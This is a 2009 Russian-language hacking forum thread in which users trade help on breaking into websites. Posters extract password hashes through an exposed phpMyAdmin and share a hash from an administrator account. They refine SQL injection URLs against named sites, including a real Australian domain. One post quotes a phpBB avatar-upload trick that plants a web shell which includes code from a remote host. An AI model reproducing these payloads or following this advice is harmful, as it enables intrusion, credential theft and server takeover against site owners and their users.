Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Isass

    Isass New Member

    Joined:
    13 Jul 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Спасибо, конечно, что такое Ddos я имею представления. Меня интересует другое, каким образом сканер проводит данную Dos атаку как она реализуется, как мне повторить её с одной тачки ведь сканирования шло тоже с одной машины, а результат был получен такой (компьютер сейчас находится в стадии перезагрузки). :cool:
     
  2. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    обсуждение дидос атак запрещено на форуме
     
  3. Isass

    Isass New Member

    Joined:
    13 Jul 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Понятно ну а с другим вопросом поможете? Опять же показал всё тот же сканер: найдена уязвимость 80/phpmyadmin/tbl_create.php иду по указанной ссылке и попадаю прямо в phpmyadmin,как мне выдернуть хеши пользователь? Если можно пошагово растолкуйте, пожалуйста.
     
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Поищи таблицу типа "users","members",etc...
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Если есть доступ к phpmyadmin и есть возможность выполнять запросы + знаешь полный путь к серваку и папку на запись - лучше залить шелл. Как залить - расписано здесь: https://forum.antichat.ru/thread104591.html
     
  6. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Все что могу сказать - фтопку Xspider - в подовляющем большинстве он пи**** как тротцкий, если уж так интересно что он пишет то - google.ru - уязвимость в phpMyAdmin + tbl_create.php, по досу - уязвимость в RDP + DDOS.
     
  7. Isass

    Isass New Member

    Joined:
    13 Jul 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Направления правильное держу?
    http://s44.radikal.ru/i104/0907/b3/afdfc9797634.jpg

    Pashkela спасибо.
     
    #8027 Isass, 15 Jul 2009
    Last edited: 15 Jul 2009
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Тут БД mysql. В текущей таблице находятся даные о пользователях mysql. Чтобы просмотреть их - нажми "Обзор"
     
  9. Isass

    Isass New Member

    Joined:
    13 Jul 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Зашёл в раздел pwweb в таблице pw_users:
    Username NoN,
    Password 875e527b6de108747f61decbd553947e:zHoPeRWthe816pjgR...
    Usertype Super Administrator
    Какой тип хеша используется?
     
  10. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет
    У меня всего 2 раза был опыт MS SQL inj И тут решил спонить старое

    нашёл инъекцию
    Code:
    http://site.ru/index.php?name=Links'
    далее довёл до ума

    Code:
    http://site.ru/index.php?name=Links'))--
    \Потом начал крутить таблицы
    Code:
    http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
    получил 1 табличку audit и решил проверить что ниже
    Code:
    http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('audit'))--
    На что меня послали куда подальше
    Code:
     message: Incorrect syntax near 'audit\'.
    видно что он скобку экранировал...(пробовал " ' `)
    Как можно это обойти?
    Попробовал в хексе но написал еррор
    Code:
    message: Conversion failed when converting the nvarchar value 'audit' to data type int.
     
    #8030 Byrger, 15 Jul 2009
    Last edited: 15 Jul 2009
  11. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E))--
    Х меняешь от одного вверх
     
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Code:
    message: An expression of non-boolean type specified in a context where a condition is expected, near ')'.
     
  13. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES))--
    сорри ,невнимательность.
    но мог бы и сам догадаться.
     
  14. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Code:
    _http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(char(97)%2Bchar(117)%2Bchar(100)%2Bchar(105)%2Bchar(116)))--
    еще можно попробовать having заюзать..
    http://forum.antichat.ru/showpost.php?p=445214&postcount=23
     
  15. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Возникла проблема... Пробую залить шелл в phpbb! есть права админа... пробую этот способ:

    ...
    6) Загрузка аваторы с php кодом, а затем инклюд.(Нужны права админа)
    Бага тоже очень распространненая, тока почему то ее, мало юзают.
    Создаем файл kiborg.txt, пишем в него


    Code:
    <? 
    $file= fopen('shell.php', 'w'); 
    fwrite($file, '<? @include("http://kiborg.h10.ru/shell/sim.txt"); ?>');
    fclose($file);
    ?>
    Меняем имя файла на kiborg.gif и загружаем его на форум.
    Заходим в профайл убеждаемся что аватора загрузилась и смотрим ее имя с путем, будет примерно следующее
    /images/avatars/49624519384cd7deb.gif
    Создаем файл 1.sql с содержимым


    Code:
    UPDATE phpbb_config SET config_value=CONCAT('english/../../images/avatars/49624519384cd7deb.gif',CHAR(0)) where config_name='default_lang';
    Ну если с мозгами все в порядке, то поймете что здесь накалякано. Востанавливаем через бд.
    Ползем по ссылке
    http://localhost/phpbb13/faq.php
    И если вы все сделали правильно, то по адрессу http://localhost/phpbb13/shell.php должен быть ваш шелл.



    Делаю всё как написано, но когда загружаю аватар выдаёт ошибку..((


    Подскажите в чём проблема... :(
     
    #8035 .:[melkiy]:., 15 Jul 2009
    Last edited: 15 Jul 2009
  16. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Хорошо, а как дальше колонки крутить если такая проблема?
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    .:[melkiy]:., попробуй файлик залить на хост, а потом грузить на форум удаленно, не со своего компа. У меня была такая ситуация.
    Byrger, дальше после NOT IN свою колонку вставляешь. Почитай статьи о MsSQL инъекциях.
     
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    уже в какой раз возникает одна и та же проблема, а именно в подборе имени таблицы, если база не показывает сразу все названия, а использовать limit 1,1 слишком долго...подскажитекак сделать это побыстрее (для начала пусть в 5-ой версии), а также, как определить, включены мэджики или нет, надо ли переводить в хекс или нет, воти лин для примера:
    http://www.brainnet.org.au/brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,table_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM+INFORMATION_SCHEMA.tables
     
  19. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+group+by+table_schema+limit+0,1





    http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,'test',4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

    если есть слово test то off если ошибка то on
     
    _________________________
  20. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Ты видимо не прочёл что выше было...
    У меня ковычка экранируется...
     
Thread Status:
Not open for further replies.